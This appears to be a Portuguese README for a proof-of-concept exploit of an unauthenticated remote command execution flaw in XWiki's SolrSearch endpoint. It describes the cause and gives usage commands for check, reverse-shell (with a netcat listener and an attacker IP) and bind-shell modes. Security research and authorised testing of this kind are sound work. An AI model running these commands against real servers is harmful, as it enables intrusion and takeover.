Prova de Conceito para CVE-2025-24893 demonstrando execução remota de comandos sem autenticação no XWiki através de avaliação insegura de templates no servidor.
Este repositório contém uma Prova de Conceito (PoC) controlada para CVE-2025-24893, uma vulnerabilidade de Execução Remota de Comandos (RCE) não autenticada que afeta o XWiki.
A vulnerabilidade permite que um invasor execute comandos arbitrários do sistema operacional no servidor devido à avaliação insegura de templates e scripts no lado do servidor.
XWiki é uma plataforma de wiki empresarial de código aberto comumente usada para:
Como o XWiki é frequentemente implantado em servidores voltados para a internet, vulnerabilidades de segurança em seu tratamento de requisições e lógica de scripting podem ter alto impacto no mundo real.
A entrada controlada pelo usuário passada para o endpoint SolrSearch foi validada e avaliada inadequadamente pelo motor de scripting Groovy. Isso permitiu que a entrada fornecida pelo invasor fosse interpretada como código executável no lado do servidor, resultando na execução de comandos no sistema host.
Esta PoC demonstra o seguinte:
Modo de Detecção de Vulnerabilidade Confirma com segurança se a instância alvo é vulnerável executando uma expressão inofensiva no lado do servidor.
Execução Remota de Comandos Demonstra a execução arbitrária de comandos no sistema alvo.
Execução de Shell Reverso Estabelece uma conexão de shell de saída do alvo para o testador.
Bind Shell (Opcional) Abre um shell de escuta no host alvo (menos confiável que shells reversos).
python3 xwiki_cve_2025_24893.py http://target:8080 -m check
nc -lvnp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m reverse -lh <attacker_ip> -lp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m bind -lp 4444
SolrSearchEste projeto é fornecido estritamente para fins educacionais e testes de segurança autorizados.
Qualquer uso não autorizado deste código contra sistemas sem permissão explícita é proibido.
Este repositório foi criado para demonstrar: